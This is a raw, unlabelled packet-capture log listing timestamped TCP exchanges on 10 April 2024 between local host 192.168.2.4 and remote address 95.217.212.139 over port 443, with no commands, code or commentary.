                                                                                                                                                                                                          Apr 10, 2024 08:56:25.416194916 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.416222095 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.416438103 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.430413961 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.430434942 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.430493116 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.430512905 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.430527925 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.430597067 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.442044973 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.442065001 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.442143917 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.442164898 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.442204952 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.455153942 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.455173016 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.455243111 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.455257893 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.455302954 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.466892004 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.466917038 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.467036009 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.467036009 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.467058897 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.467241049 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.477541924 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.477560997 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.477716923 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.477716923 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.477740049 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.477961063 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.487638950 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.487657070 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.487793922 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.487817049 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.488028049 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.498794079 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.498819113 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.498873949 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.498897076 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.498910904 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.498970032 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.508976936 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.508996964 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.509131908 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.509131908 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.509155035 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.509356976 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.517756939 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.517776012 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.517909050 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.517909050 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.517931938 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.518100977 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.527672052 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.527692080 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.527821064 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.527821064 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.527842999 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.528055906 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.535903931 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.535923004 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.536065102 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.536088943 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.536319971 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.544454098 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.544477940 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.544605017 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.544605017 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.544627905 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.544799089 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.552031994 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.552052021 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.552113056 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.552123070 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.552283049 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.560555935 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.560574055 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.560621977 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.560632944 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.560652018 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.560673952 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.567656040 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.567673922 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.567819118 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.567842007 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.568073034 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.575129032 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.575149059 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.575205088 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.575218916 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.575261116 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.582930088 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.582948923 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.583005905 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.583013058 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.583067894 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.589535952 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.589555025 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.589700937 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.589723110 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.589894056 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.595856905 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.595875025 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.596019983 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.596019983 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.596041918 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.596242905 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.602613926 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.602633953 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.602777958 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.602777958 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.602801085 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.603051901 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.609736919 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.609755993 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.609803915 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.609816074 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.609833956 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.609996080 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.615704060 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.615722895 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.615776062 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.615787983 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.615834951 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.622416973 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.622435093 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.622492075 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.622498035 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.622653008 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.628743887 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.628765106 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.628814936 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.628827095 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.628846884 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.628873110 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.634100914 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.634119987 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.634174109 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.634180069 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.634202003 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.634226084 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.639542103 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.639561892 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.639621019 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.639626026 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.639668941 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.645698071 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.645733118 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.645809889 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.645816088 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.645859957 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.651321888 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.651340961 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.651392937 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.651400089 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.651415110 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.651447058 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.656403065 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.656420946 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.656481981 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.656487942 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.656528950 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.662307978 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.662327051 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.662388086 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.662395954 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.662436962 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.667285919 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.667304993 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.667366982 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.667371988 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.667412996 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.672610044 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.672627926 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.672689915 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.672696114 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.672736883 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.677371979 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.677390099 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.677453041 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.677458048 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.677500010 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.682852030 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.682872057 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.682930946 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.682935953 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.682969093 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.682988882 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.687572956 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.687592030 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.687680006 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.687685966 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.687727928 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.692475080 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.692493916 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.692550898 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.692558050 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.692585945 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.692600965 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.698103905 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.698122978 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.698179007 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.698184013 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.698209047 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.698223114 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.703094959 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.703115940 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.703157902 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.703164101 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.703200102 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.703212976 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.708915949 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.708935022 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.708981991 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.708986998 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.709009886 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.709033012 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.712889910 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.712908983 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.712965965 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.712970972 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.712999105 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.713017941 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.718117952 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.718144894 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.718189955 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.718194008 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.718215942 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.718236923 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.721987009 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.722011089 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.722057104 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.722063065 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.722093105 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.722106934 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.726960897 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.726979971 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.727040052 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.727044106 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.727075100 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.727088928 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.731348991 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.731373072 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.731411934 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.731416941 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.731441975 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.731457949 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.735316992 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.735336065 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.735394001 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.735404015 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.735440016 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.739005089 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.739023924 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.739077091 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.739079952 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.739109993 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.739115953 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.743891001 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.743908882 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.743968010 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.743973017 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.743998051 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.744007111 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.747700930 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.747720003 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.747760057 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.747764111 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.747775078 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.747807026 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.751506090 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.751524925 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.751564026 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.751569033 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.751597881 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.751614094 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.756134987 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.756154060 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.756211042 CEST49753443192.168.2.495.217.212.139
